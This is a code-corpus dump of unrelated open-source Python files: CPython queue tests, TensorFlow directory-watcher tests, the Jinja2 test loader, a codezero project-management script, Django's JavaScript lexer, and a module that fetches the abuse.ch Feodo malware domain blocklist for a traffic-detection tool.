q.put(222)
target_order = dict(Queue = [111, 333, 222],
LifoQueue = [222, 333, 111],
PriorityQueue = [111, 222, 333])
actual_order = [q.get(), q.get(), q.get()]
self.assertEqual(actual_order, target_order[q.__class__.__name__],
"Didn't seem to queue the correct data!")
for i in range(QUEUE_SIZE-1):
q.put(i)
self.assertTrue(q.qsize(), "Queue should not be empty")
self.assertTrue(not qfull(q), "Queue should not be full")
last = 2 * QUEUE_SIZE
full = 3 * 2 * QUEUE_SIZE
q.put(last)
self.assertTrue(qfull(q), "Queue should be full")
self.assertFalse(q.empty())
self.assertTrue(q.full())
try:
q.put(full, block=0)
self.fail("Didn't appear to block with a full queue")
except self.queue.Full:
pass
try:
q.put(full, timeout=0.01)
self.fail("Didn't appear to time-out with a full queue")
except self.queue.Full:
pass
# Test a blocking put
self.do_blocking_test(q.put, (full,), q.get, ())
self.do_blocking_test(q.put, (full, True, 10), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
try:
q.get(block=0)
self.fail("Didn't appear to block with an empty queue")
except self.queue.Empty:
pass
try:
q.get(timeout=0.01)
self.fail("Didn't appear to time-out with an empty queue")
except self.queue.Empty:
pass
# Test a blocking get
self.do_blocking_test(q.get, (), q.put, ('empty',))
self.do_blocking_test(q.get, (True, 10), q.put, ('empty',))
def worker(self, q):
while True:
x = q.get()
if x < 0:
q.task_done()
return
with self.cumlock:
self.cum += x
q.task_done()
def queue_join_test(self, q):
self.cum = 0
threads = []
for i in (0,1):
thread = threading.Thread(target=self.worker, args=(q,))
thread.start()
threads.append(thread)
for i in range(100):
q.put(i)
q.join()
self.assertEqual(self.cum, sum(range(100)),
"q.join() did not block until all tasks were done")
for i in (0,1):
q.put(-1) # instruct the threads to close
q.join() # verify that you can join twice
for thread in threads:
thread.join()
def test_queue_task_done(self):
# Test to make sure a queue task completed successfully.
q = self.type2test()
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_queue_join(self):
# Test that a queue join()s successfully, and before anything else
# (done twice for insurance).
q = self.type2test()
self.queue_join_test(q)
self.queue_join_test(q)
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_basic(self):
# Do it a couple of times on the same queue.
# Done twice to make sure it works with the same instance reused.
q = self.type2test(QUEUE_SIZE)
self.basic_queue_test(q)
self.basic_queue_test(q)
def test_negative_timeout_raises_exception(self):
q = self.type2test(QUEUE_SIZE)
with self.assertRaises(ValueError):
q.put(1, timeout=-1)
with self.assertRaises(ValueError):
q.get(1, timeout=-1)
def test_nowait(self):
q = self.type2test(QUEUE_SIZE)
for i in range(QUEUE_SIZE):
q.put_nowait(1)
with self.assertRaises(self.queue.Full):
q.put_nowait(1)
for i in range(QUEUE_SIZE):
q.get_nowait()
with self.assertRaises(self.queue.Empty):
q.get_nowait()
def test_shrinking_queue(self):
# issue 10110
q = self.type2test(3)
q.put(1)
q.put(2)
q.put(3)
with self.assertRaises(self.queue.Full):
q.put_nowait(4)
self.assertEqual(q.qsize(), 3)
q.maxsize = 2 # shrink the queue
with self.assertRaises(self.queue.Full):
q.put_nowait(4)
class QueueTest(BaseQueueTestMixin):
def setUp(self):
self.type2test = self.queue.Queue
super().setUp()
class PyQueueTest(QueueTest, unittest.TestCase):
queue = py_queue
@need_c_queue
class CQueueTest(QueueTest, unittest.TestCase):
queue = c_queue
class LifoQueueTest(BaseQueueTestMixin):
def setUp(self):
self.type2test = self.queue.LifoQueue
super().setUp()
class PyLifoQueueTest(LifoQueueTest, unittest.TestCase):
queue = py_queue
@need_c_queue
class CLifoQueueTest(LifoQueueTest, unittest.TestCase):
queue = c_queue
class PriorityQueueTest(BaseQueueTestMixin):
def setUp(self):
self.type2test = self.queue.PriorityQueue
super().setUp()
class PyPriorityQueueTest(PriorityQueueTest, unittest.TestCase):
queue = py_queue
@need_c_queue
class CPriorityQueueTest(PriorityQueueTest, unittest.TestCase):
queue = c_queue
# A Queue subclass that can provoke failure at a moment's notice :)
class FailingQueueException(Exception): pass
class FailingQueueTest(BlockingTestMixin):
def setUp(self):
Queue = self.queue.Queue
class FailingQueue(Queue):
def __init__(self, *args):
self.fail_next_put = False
self.fail_next_get = False
Queue.__init__(self, *args)
def _put(self, item):
if self.fail_next_put:
self.fail_next_put = False
raise FailingQueueException("You Lose")
return Queue._put(self, item)
def _get(self):
if self.fail_next_get:
self.fail_next_get = False
raise FailingQueueException("You Lose")
return Queue._get(self)
self.FailingQueue = FailingQueue
super().setUp()
def failing_queue_test(self, q):
if q.qsize():
raise RuntimeError("Call this function with an empty queue")
for i in range(QUEUE_SIZE-1):
q.put(i)
# Test a failing non-blocking put.
q.fail_next_put = True
try:
q.put("oops", block=0)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.fail_next_put = True
try:
q.put("oops", timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
# Test a failing blocking put
q.fail_next_put = True
try:
self.do_blocking_test(q.put, ("full",), q.get, ())
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
# Test a failing timeout put
q.fail_next_put = True
try:
self.do_exceptional_blocking_test(q.put, ("full", True, 10), q.get, (),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
q.get()
self.assertTrue(not qfull(q), "Queue should not be full")
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
# Test a blocking put
self.do_blocking_test(q.put, ("full",), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
q.put("first")
q.fail_next_get = True
try:
q.get()
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), "Queue should not be empty")
q.fail_next_get = True
try:
q.get(timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), "Queue should not be empty")
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
q.fail_next_get = True
try:
self.do_exceptional_blocking_test(q.get, (), q.put, ('empty',),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# put succeeded, but get failed.
self.assertTrue(q.qsize(), "Queue should not be empty")
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
def test_failing_queue(self):
# Test to make sure a queue is functioning correctly.
# Done twice on the same instance.
q = self.FailingQueue(QUEUE_SIZE)
self.failing_queue_test(q)
self.failing_queue_test(q)
class PyFailingQueueTest(FailingQueueTest, unittest.TestCase):
queue = py_queue
@need_c_queue
class CFailingQueueTest(FailingQueueTest, unittest.TestCase):
queue = c_queue
class BaseSimpleQueueTest:
def setUp(self):
self.q = self.type2test()
def feed(self, q, seq, rnd):
while True:
try:
val = seq.pop()
except IndexError:
return
q.put(val)
if rnd.random() > 0.5:
time.sleep(rnd.random() * 1e-3)
def consume(self, q, results, sentinel):
while True:
val = q.get()
if val == sentinel:
return
results.append(val)
def consume_nonblock(self, q, results, sentinel):
while True:
while True:
try:
val = q.get(block=False)
except self.queue.Empty:
time.sleep(1e-5)
else:
break
if val == sentinel:
return
results.append(val)
def consume_timeout(self, q, results, sentinel):
while True:
while True:
try:
val = q.get(timeout=1e-5)
except self.queue.Empty:
pass
else:
break
if val == sentinel:
return
results.append(val)
def run_threads(self, n_feeders, n_consumers, q, inputs,
feed_func, consume_func):
results = []
sentinel = None
seq = inputs + [sentinel] * n_consumers
seq.reverse()
rnd = random.Random(42)
exceptions = []
def log_exceptions(f):
def wrapper(*args, **kwargs):
try:
f(*args, **kwargs)
except BaseException as e:
exceptions.append(e)
return wrapper
feeders = [threading.Thread(target=log_exceptions(feed_func),
args=(q, seq, rnd))
for i in range(n_feeders)]
consumers = [threading.Thread(target=log_exceptions(consume_func),
args=(q, results, sentinel))
for i in range(n_consumers)]
with support.start_threads(feeders + consumers):
pass
self.assertFalse(exceptions)
self.assertTrue(q.empty())
self.assertEqual(q.qsize(), 0)
return results
def test_basic(self):
# Basic tests for get(), put() etc.
q = self.q
self.assertTrue(q.empty())
self.assertEqual(q.qsize(), 0)
q.put(1)
self.assertFalse(q.empty())
self.assertEqual(q.qsize(), 1)
q.put(2)
q.put_nowait(3)
q.put(4)
self.assertFalse(q.empty())
self.assertEqual(q.qsize(), 4)
self.assertEqual(q.get(), 1)
self.assertEqual(q.qsize(), 3)
self.assertEqual(q.get_nowait(), 2)
self.assertEqual(q.qsize(), 2)
self.assertEqual(q.get(block=False), 3)
self.assertFalse(q.empty())
self.assertEqual(q.qsize(), 1)
self.assertEqual(q.get(timeout=0.1), 4)
self.assertTrue(q.empty())
self.assertEqual(q.qsize(), 0)
with self.assertRaises(self.queue.Empty):
q.get(block=False)
with self.assertRaises(self.queue.Empty):
q.get(timeout=1e-3)
with self.assertRaises(self.queue.Empty):
q.get_nowait()
self.assertTrue(q.empty())
self.assertEqual(q.qsize(), 0)
def test_negative_timeout_raises_exception(self):
q = self.q
q.put(1)
with self.assertRaises(ValueError):
q.get(timeout=-1)
def test_order(self):
# Test a pair of concurrent put() and get()
q = self.q
inputs = list(range(100))
results = self.run_threads(1, 1, q, inputs, self.feed, self.consume)
# One producer, one consumer => results appended in well-defined order
self.assertEqual(results, inputs)
def test_many_threads(self):
# Test multiple concurrent put() and get()
N = 50
q = self.q
inputs = list(range(10000))
results = self.run_threads(N, N, q, inputs, self.feed, self.consume)
# Multiple consumers without synchronization append the
# results in random order
self.assertEqual(sorted(results), inputs)
def test_many_threads_nonblock(self):
# Test multiple concurrent put() and get(block=False)
N = 50
q = self.q
inputs = list(range(10000))
results = self.run_threads(N, N, q, inputs,
self.feed, self.consume_nonblock)
self.assertEqual(sorted(results), inputs)
def test_many_threads_timeout(self):
# Test multiple concurrent put() and get(timeout=...)
N = 50
q = self.q
inputs = list(range(1000))
results = self.run_threads(N, N, q, inputs,
self.feed, self.consume_timeout)
self.assertEqual(sorted(results), inputs)
def test_references(self):
# The queue should lose references to each item as soon as
# it leaves the queue.
class C:
pass
N = 20
q = self.q
for i in range(N):
q.put(C())
for i in range(N):
wr = weakref.ref(q.get())
self.assertIsNone(wr())
class PySimpleQueueTest(BaseSimpleQueueTest, unittest.TestCase):
queue = py_queue
def setUp(self):
self.type2test = self.queue._PySimpleQueue
super().setUp()
@need_c_queue
class CSimpleQueueTest(BaseSimpleQueueTest, unittest.TestCase):
queue = c_queue
def setUp(self):
self.type2test = self.queue.SimpleQueue
super().setUp()
def test_is_default(self):
self.assertIs(self.type2test, self.queue.SimpleQueue)
self.assertIs(self.type2test, self.queue.SimpleQueue)
def test_reentrancy(self):
# bpo-14976: put() may be called reentrantly in an asynchronous
# callback.
q = self.q
gen = itertools.count()
N = 10000
results = []
# This test exploits the fact that __del__ in a reference cycle
# can be called any time the GC may run.
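# (A hedged reading of the trick: each Circular instance becomes
# unreachable as soon as `o` is deleted; when the GC collects the cycle,
# __del__ runs and re-enters q.put() from whatever point the interpreter
# happens to be at, so puts can interleave arbitrarily with the loop below.)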
class Circular(object):
def __init__(self):
self.circular = self
def __del__(self):
q.put(next(gen))
while True:
o = Circular()
q.put(next(gen))
del o
results.append(q.get())
if results[-1] >= N:
break
self.assertEqual(results, list(range(N + 1)))
if __name__ == "__main__":
unittest.main()
|
natanielruiz/android-yolo
|
refs/heads/master
|
jni-build/jni/include/tensorflow/python/summary/impl/directory_watcher_test.py
|
4
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for directory_watcher."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
from tensorflow.python.framework import test_util
from tensorflow.python.platform import googletest
from tensorflow.python.summary.impl import directory_watcher
class _ByteLoader(object):
"""A loader that loads individual bytes from a file."""
def __init__(self, path):
self._f = open(path)
self.bytes_read = 0
def Load(self):
while True:
self._f.seek(self.bytes_read)
byte = self._f.read(1)
if byte:
self.bytes_read += 1
yield byte
else:
return
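# A brief sketch of the loader contract DirectoryWatcher relies on (the path
# is hypothetical): each Load() call resumes from the last byte read, e.g.
#     loader = _ByteLoader('/tmp/example')  # file containing "abc"
#     list(loader.Load())  # -> ['a', 'b', 'c']
#     list(loader.Load())  # -> [] until more bytes are appended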
class DirectoryWatcherTest(test_util.TensorFlowTestCase):
def setUp(self):
# Put everything in a directory so it's easier to delete.
self._directory = os.path.join(self.get_temp_dir(), 'monitor_dir')
os.mkdir(self._directory)
self._watcher = directory_watcher.DirectoryWatcher(self._directory,
_ByteLoader)
def tearDown(self):
shutil.rmtree(self._directory)
def _WriteToFile(self, filename, data):
path = os.path.join(self._directory, filename)
with open(path, 'a') as f:
f.write(data)
def _LoadAllEvents(self):
"""Loads all events in the watcher."""
for _ in self._watcher.Load():
pass
def assertWatcherYields(self, values):
self.assertEqual(list(self._watcher.Load()), values)
def testRaisesWithBadArguments(self):
with self.assertRaises(ValueError):
directory_watcher.DirectoryWatcher(None, lambda x: None)
with self.assertRaises(ValueError):
directory_watcher.DirectoryWatcher('dir', None)
def testEmptyDirectory(self):
self.assertWatcherYields([])
def testSingleWrite(self):
self._WriteToFile('a', 'abc')
self.assertWatcherYields(['a', 'b', 'c'])
self.assertFalse(self._watcher.OutOfOrderWritesDetected())
def testMultipleWrites(self):
self._WriteToFile('a', 'abc')
self.assertWatcherYields(['a', 'b', 'c'])
self._WriteToFile('a', 'xyz')
self.assertWatcherYields(['x', 'y', 'z'])
self.assertFalse(self._watcher.OutOfOrderWritesDetected())
def testMultipleLoads(self):
self._WriteToFile('a', 'a')
self._watcher.Load()
self._watcher.Load()
self.assertWatcherYields(['a'])
self.assertFalse(self._watcher.OutOfOrderWritesDetected())
def testMultipleFilesAtOnce(self):
self._WriteToFile('b', 'b')
self._WriteToFile('a', 'a')
self.assertWatcherYields(['a', 'b'])
self.assertFalse(self._watcher.OutOfOrderWritesDetected())
def testFinishesLoadingFileWhenSwitchingToNewFile(self):
self._WriteToFile('a', 'a')
# Empty the iterator.
self.assertEqual(['a'], list(self._watcher.Load()))
self._WriteToFile('a', 'b')
self._WriteToFile('b', 'c')
# The watcher should finish its current file before starting a new one.
self.assertWatcherYields(['b', 'c'])
self.assertFalse(self._watcher.OutOfOrderWritesDetected())
def testIntermediateEmptyFiles(self):
self._WriteToFile('a', 'a')
self._WriteToFile('b', '')
self._WriteToFile('c', 'c')
self.assertWatcherYields(['a', 'c'])
self.assertFalse(self._watcher.OutOfOrderWritesDetected())
def testPathFilter(self):
self._watcher = directory_watcher.DirectoryWatcher(
self._directory, _ByteLoader,
lambda path: 'do_not_watch_me' not in path)
self._WriteToFile('a', 'a')
self._WriteToFile('do_not_watch_me', 'b')
self._WriteToFile('c', 'c')
self.assertWatcherYields(['a', 'c'])
self.assertFalse(self._watcher.OutOfOrderWritesDetected())
def testDetectsNewOldFiles(self):
self._WriteToFile('b', 'a')
self._LoadAllEvents()
self._WriteToFile('a', 'a')
self._LoadAllEvents()
self.assertTrue(self._watcher.OutOfOrderWritesDetected())
def testIgnoresNewerFiles(self):
self._WriteToFile('a', 'a')
self._LoadAllEvents()
self._WriteToFile('q', 'a')
self._LoadAllEvents()
self.assertFalse(self._watcher.OutOfOrderWritesDetected())
def testDetectsChangingOldFiles(self):
self._WriteToFile('a', 'a')
self._WriteToFile('b', 'a')
self._LoadAllEvents()
self._WriteToFile('a', 'c')
self._LoadAllEvents()
self.assertTrue(self._watcher.OutOfOrderWritesDetected())
def testDoesntCrashWhenFileIsDeleted(self):
self._WriteToFile('a', 'a')
self._LoadAllEvents()
os.remove(os.path.join(self._directory, 'a'))
self._WriteToFile('b', 'b')
self.assertWatcherYields(['b'])
if __name__ == '__main__':
googletest.main()
|
marcoantoniooliveira/labweb
|
refs/heads/master
|
oscar/lib/python2.7/site-packages/jinja2/testsuite/__init__.py
|
404
|
# -*- coding: utf-8 -*-
"""
jinja2.testsuite
~~~~~~~~~~~~~~~~
All the unittests of Jinja2. These tests can be executed by
running run-tests.py, optionally using multiple Python versions
at the same time.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import os
import re
import sys
import unittest
from traceback import format_exception
from jinja2 import loaders
from jinja2._compat import PY2
here = os.path.dirname(os.path.abspath(__file__))
dict_loader = loaders.DictLoader({
'justdict.html': 'FOO'
})
package_loader = loaders.PackageLoader('jinja2.testsuite.res', 'templates')
filesystem_loader = loaders.FileSystemLoader(here + '/res/templates')
function_loader = loaders.FunctionLoader({'justfunction.html': 'FOO'}.get)
choice_loader = loaders.ChoiceLoader([dict_loader, package_loader])
prefix_loader = loaders.PrefixLoader({
'a': filesystem_loader,
'b': dict_loader
})
class JinjaTestCase(unittest.TestCase):
### Use only these methods for testing. If you need a standard
### unittest method, wrap it!
def setup(self):
pass
def teardown(self):
pass
def setUp(self):
self.setup()
def tearDown(self):
self.teardown()
def assert_equal(self, a, b):
return self.assertEqual(a, b)
def assert_raises(self, *args, **kwargs):
return self.assertRaises(*args, **kwargs)
def assert_traceback_matches(self, callback, expected_tb):
try:
callback()
except Exception as e:
tb = format_exception(*sys.exc_info())
if re.search(expected_tb.strip(), ''.join(tb)) is None:
self.fail('Traceback did not match:\n\n%s\nexpected:\n%s'
% (''.join(tb), expected_tb))
else:
self.fail('Expected exception')
def find_all_tests(suite):
"""Yields all the tests and their names from a given suite."""
suites = [suite]
while suites:
s = suites.pop()
try:
suites.extend(s)
except TypeError:
yield s, '%s.%s.%s' % (
s.__class__.__module__,
s.__class__.__name__,
s._testMethodName
)
class BetterLoader(unittest.TestLoader):
"""A nicer loader that solves two problems. First of all we are setting
up tests from different sources and we're doing this programmatically
which breaks the default loading logic, so this is required anyway.
Secondly, this loader has nicer matching for test names than the
default one so you can just do ``run-tests.py ViewTestCase`` and it
will work.
"""
def getRootSuite(self):
return suite()
def loadTestsFromName(self, name, module=None):
root = self.getRootSuite()
if name == 'suite':
return root
all_tests = []
for testcase, testname in find_all_tests(root):
if testname == name or \
testname.endswith('.' + name) or \
('.' + name + '.') in testname or \
testname.startswith(name + '.'):
all_tests.append(testcase)
if not all_tests:
raise LookupError('could not find test case for "%s"' % name)
if len(all_tests) == 1:
return all_tests[0]
rv = unittest.TestSuite()
for test in all_tests:
rv.addTest(test)
return rv
def suite():
from jinja2.testsuite import ext, filters, tests, core_tags, \
loader, inheritance, imports, lexnparse, security, api, \
regression, debug, utils, bytecode_cache, doctests
suite = unittest.TestSuite()
suite.addTest(ext.suite())
suite.addTest(filters.suite())
suite.addTest(tests.suite())
suite.addTest(core_tags.suite())
suite.addTest(loader.suite())
suite.addTest(inheritance.suite())
suite.addTest(imports.suite())
suite.addTest(lexnparse.suite())
suite.addTest(security.suite())
suite.addTest(api.suite())
suite.addTest(regression.suite())
suite.addTest(debug.suite())
suite.addTest(utils.suite())
suite.addTest(bytecode_cache.suite())
# doctests will not run on python 3 currently. Too many issues
# with that, do not test that on that platform.
if PY2:
suite.addTest(doctests.suite())
return suite
def main():
"""Runs the testsuite as command line application."""
try:
unittest.main(testLoader=BetterLoader(), defaultTest='suite')
except Exception as e:
print('Error: %s' % e)
|
drasko/codezero
|
refs/heads/master
|
scripts/baremetal/baremetal_add_container.py
|
3
|
#! /usr/bin/env python2.6
# -*- mode: python; coding: utf-8; -*-
#
# Script to add/remove project to baremetal
# menu of main screen
#
# This script should be called from project root directory
#
import os, sys, shutil, re
PROJRELROOT = '../../'
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), PROJRELROOT)))
from optparse import OptionParser
from os.path import join
from shutil import copytree
from scripts.config.projpaths import *
def parse_cmdline_options():
usage = "usage: %prog [options] arg"
parser = OptionParser(usage)
parser.add_option("-a", "--add", action = "store_true", default = False,
dest = "addproject", help = "Add new project to baremetal projects")
parser.add_option("-d", "--del", action = "store_true", default = False,
dest = "delproject", help = "Delete existing project from baremetal projects")
parser.add_option("-i", "--desc", type = "string", dest = "projdesc",
help = "Description of new project to be added")
parser.add_option("-s", "--src", type = "string", dest = "srcpath",
help = "With -a, Source directory for new project to be added \
With -d, Source directory of baremetal project to be deleted")
(options, args) = parser.parse_args()
# Sanity checks
if (not options.addproject and not options.delproject) or \
(options.addproject and options.delproject):
parser.error("Only one of -a or -d needed, use -h argument for help")
exit()
if options.addproject:
add_del = 1
if not options.projdesc or not options.srcpath:
parser.error("--desc or --src missing, use -h argument for help")
exit()
if options.delproject:
add_del = 0
if options.projdesc or not options.srcpath:
parser.error("--desc provided or --src missing with -d, use -h argument for help")
exit()
return options.projdesc, options.srcpath, add_del
def container_cml_templ_del_symbl(projname):
cont_templ = "config/cml/container_ruleset.template"
sym = "CONT%(cn)d_BAREMETAL_PROJ_" + projname.upper()
buffer = ""
with open(cont_templ, 'r') as fin:
exist = False
# Prepare buffer for new cont_templ with new project symbols added
for line in fin:
parts = line.split()
# Find out where baremetal symbols start in cont_templ
if len(parts) > 1 and parts[0] == sym:
exist = True
continue
elif len(parts) == 1 and parts[0] == sym:
continue
buffer += line
if exist == False:
print "Baremetal project named " + projname + " does not exist"
exit()
# Write new cont_templ
with open(cont_templ, 'w+') as fout:
fout.write(buffer)
def container_cml_templ_add_symbl(projdesc, projname):
cont_templ = "config/cml/container_ruleset.template"
pattern = re.compile("(CONT\%\(cn\)d_BAREMETAL_PROJ_)(.*)")
baremetal_name_templ = "CONT%(cn)d_BAREMETAL_PROJ_"
new_sym = baremetal_name_templ + projname.upper()
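# Example (project name illustrative): for a project named "hello", the
# symbol added to the template is CONT%(cn)d_BAREMETAL_PROJ_HELLO.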
buffer = ""
with open(cont_templ, 'r') as fin:
baremetal_sym_found = False
last_baremetal_proj = ""
# Prepare buffer for new cont_templ with new project symbols added
for line in fin:
parts = line.split()
# Find out where baremetal symbols start in cont_templ
if len(parts) > 1 and re.match(pattern, parts[0]):
baremetal_sym_found = True
# Find the name of last baremetal project already present in list
last_baremetal_proj = parts[0][len(baremetal_name_templ):]
# We are done with baremetal symbols, add new symbol to buffer
elif baremetal_sym_found == True:
baremetal_sym_found = False
sym_def = new_sym + "\t\'" + projdesc + "\'\n"
buffer += sym_def
# Search for baremetal menu and add new project symbol
elif len(parts) == 1 and \
parts[0] == baremetal_name_templ + last_baremetal_proj:
sym_reference = "\t" + new_sym + "\n"
line += sym_reference
buffer += line
# Write new cont_templ
with open(cont_templ, 'w+') as fout:
fout.write(buffer)
def add_project(projdesc, srcdir, projname):
container_cml_templ_add_symbl(projdesc, projname)
baremetal_dir = "conts/baremetal"
dest_dir = join(baremetal_dir, projname)
print "Copying source files from " + srcdir + " to " + dest_dir
shutil.copytree(srcdir, dest_dir)
print "Done, New baremetal project " + projname + \
" is ready to be used."
def del_project(srcdir, projname):
container_cml_templ_del_symbl(projname)
baremetal_dir = "conts/baremetal"
src_dir = join(baremetal_dir, projname)
print "Deleting source files from " + src_dir
shutil.rmtree(src_dir, ignore_errors=True)
print "Done.."
def main():
projdesc, srcdir, add_del = parse_cmdline_options()
# Get the base directory
projpath, projname = os.path.split(srcdir)
# Python's os.path.split() returns an empty basename if the path ends
# with '/', so we need to correct this manually.
if projname == "":
projpath, projname = os.path.split(projpath)
if add_del == 1:
add_project(projdesc, srcdir, projname)
else:
del_project(srcdir, projname)
# Delete the config.cml file, so that user can see new projects
os.system("rm -f " + CML2_CONFIG_FILE)
if __name__ == "__main__":
main()
|
GhostThrone/django
|
refs/heads/master
|
django/utils/jslex.py
|
335
|
"""JsLex: a lexer for Javascript"""
# Originally from https://bitbucket.org/ned/jslex
from __future__ import unicode_literals
import re
class Tok(object):
"""
A specification for a token class.
"""
num = 0
def __init__(self, name, regex, next=None):
self.id = Tok.num
Tok.num += 1
self.name = name
self.regex = regex
self.next = next
def literals(choices, prefix="", suffix=""):
"""
Create a regex from a space-separated list of literal `choices`.
If provided, `prefix` and `suffix` will be attached to each choice
individually.
"""
return "|".join(prefix + re.escape(c) + suffix for c in choices.split())
class Lexer(object):
"""
A generic multi-state regex-based lexer.
"""
def __init__(self, states, first):
self.regexes = {}
self.toks = {}
for state, rules in states.items():
parts = []
for tok in rules:
groupid = "t%d" % tok.id
self.toks[groupid] = tok
parts.append("(?P<%s>%s)" % (groupid, tok.regex))
self.regexes[state] = re.compile("|".join(parts), re.MULTILINE | re.VERBOSE)
self.state = first
def lex(self, text):
"""
Lexically analyze `text`.
Yields pairs (`name`, `tokentext`).
"""
end = len(text)
state = self.state
regexes = self.regexes
toks = self.toks
start = 0
while start < end:
for match in regexes[state].finditer(text, start):
name = match.lastgroup
tok = toks[name]
toktext = match.group(name)
start += len(toktext)
yield (tok.name, toktext)
if tok.next:
state = tok.next
break
self.state = state
class JsLexer(Lexer):
"""
A Javascript lexer
>>> lexer = JsLexer()
>>> list(lexer.lex("a = 1"))
[('id', 'a'), ('ws', ' '), ('punct', '='), ('ws', ' '), ('dnum', '1')]
This doesn't properly handle non-ASCII characters in the Javascript source.
"""
# Because these tokens are matched as alternatives in a regex, longer
# possibilities must appear in the list before shorter ones, for example,
# '>>' before '>'.
#
# Note that we don't have to detect malformed Javascript, only properly
# lex correct Javascript, so much of this is simplified.
# Details of Javascript lexical structure are taken from
# http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-262.pdf
# A useful explanation of automatic semicolon insertion is at
# http://inimino.org/~inimino/blog/javascript_semicolons
both_before = [
Tok("comment", r"/\*(.|\n)*?\*/"),
Tok("linecomment", r"//.*?$"),
Tok("ws", r"\s+"),
Tok("keyword", literals("""
break case catch class const continue debugger
default delete do else enum export extends
finally for function if import in instanceof
new return super switch this throw try typeof
var void while with
""", suffix=r"\b"), next='reg'),
Tok("reserved", literals("null true false", suffix=r"\b"), next='div'),
Tok("id", r"""
([a-zA-Z_$]|\\u[0-9a-fA-F]{4}) # first char
([a-zA-Z_$0-9]|\\u[0-9a-fA-F]{4})* # rest chars
""", next='div'),
Tok("hnum", r"0[xX][0-9a-fA-F]+", next='div'),
Tok("onum", r"0[0-7]+"),
Tok("dnum", r"""
( (0|[1-9][0-9]*) # DecimalIntegerLiteral
\. # dot
[0-9]* # DecimalDigits-opt
([eE][-+]?[0-9]+)? # ExponentPart-opt
|
\. # dot
[0-9]+ # DecimalDigits
([eE][-+]?[0-9]+)? # ExponentPart-opt
|
(0|[1-9][0-9]*) # DecimalIntegerLiteral
([eE][-+]?[0-9]+)? # ExponentPart-opt
)
""", next='div'),
Tok("punct", literals("""
>>>= === !== >>> <<= >>= <= >= == != << >> &&
|| += -= *= %= &= |= ^=
"""), next="reg"),
Tok("punct", literals("++ -- ) ]"), next='div'),
Tok("punct", literals("{ } ( [ . ; , < > + - * % & | ^ ! ~ ? : ="), next='reg'),
Tok("string", r'"([^"\\]|(\\(.|\n)))*?"', next='div'),
Tok("string", r"'([^'\\]|(\\(.|\n)))*?'", next='div'),
]
both_after = [
Tok("other", r"."),
]
states = {
# slash will mean division
'div': both_before + [
Tok("punct", literals("/= /"), next='reg'),
] + both_after,
# slash will mean regex
'reg': both_before + [
Tok("regex",
r"""
/ # opening slash
# First character is..
( [^*\\/[] # anything but * \ / or [
| \\. # or an escape sequence
| \[ # or a class, which has
( [^\]\\] # anything but \ or ]
| \\. # or an escape sequence
)* # many times
\]
)
# Following characters are same, except for excluding a star
( [^\\/[] # anything but \ / or [
| \\. # or an escape sequence
| \[ # or a class, which has
( [^\]\\] # anything but \ or ]
| \\. # or an escape sequence
)* # many times
\]
)* # many times
/ # closing slash
[a-zA-Z0-9]* # trailing flags
""", next='div'),
] + both_after,
}
def __init__(self):
super(JsLexer, self).__init__(self.states, 'reg')
def prepare_js_for_gettext(js):
"""
Convert the Javascript source `js` into something resembling C for
xgettext.
What actually happens is that all the regex literals are replaced with
"REGEX".
"""
def escape_quotes(m):
"""Used in a regex to properly escape double quotes."""
s = m.group(0)
if s == '"':
return r'\"'
else:
return s
lexer = JsLexer()
c = []
for name, tok in lexer.lex(js):
if name == 'regex':
# C doesn't grok regexes, and they aren't needed for gettext,
# so just output a string instead.
tok = '"REGEX"'
elif name == 'string':
# C doesn't have single-quoted strings, so make all strings
# double-quoted.
if tok.startswith("'"):
guts = re.sub(r"\\.|.", escape_quotes, tok[1:-1])
tok = '"' + guts + '"'
elif name == 'id':
# C can't deal with Unicode escapes in identifiers. We don't
# need them for gettext anyway, so replace them with something
# innocuous
tok = tok.replace("\\", "U")
c.append(tok)
return ''.join(c)
|
JustF0rWork/malware
|
refs/heads/master
|
trails/feeds/feodotrackerdns.py
|
1
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2016 Miroslav Stampar (@stamparm)
See the file 'LICENSE' for copying permission
"""
from core.common import retrieve_content
__url__ = "https://feodotracker.abuse.ch/blocklist/?download=domainblocklist"
__check__ = "Feodo"
__info__ = "feodo (malware)"
__reference__ = "abuse.ch"
def fetch():
retval = {}
content = retrieve_content(__url__)
if __check__ in content:
for line in content.split('\n'):
line = line.strip()
if not line or line.startswith('#'):
continue
retval[line] = (__info__, __reference__)
return retval
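# Sketch of the expected result shape (the domain is illustrative):
#     fetch() -> {"example-c2-domain.com": ("feodo (malware)", "abuse.ch")}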
|
MattNolanLab/gridcells
|
refs/heads/master
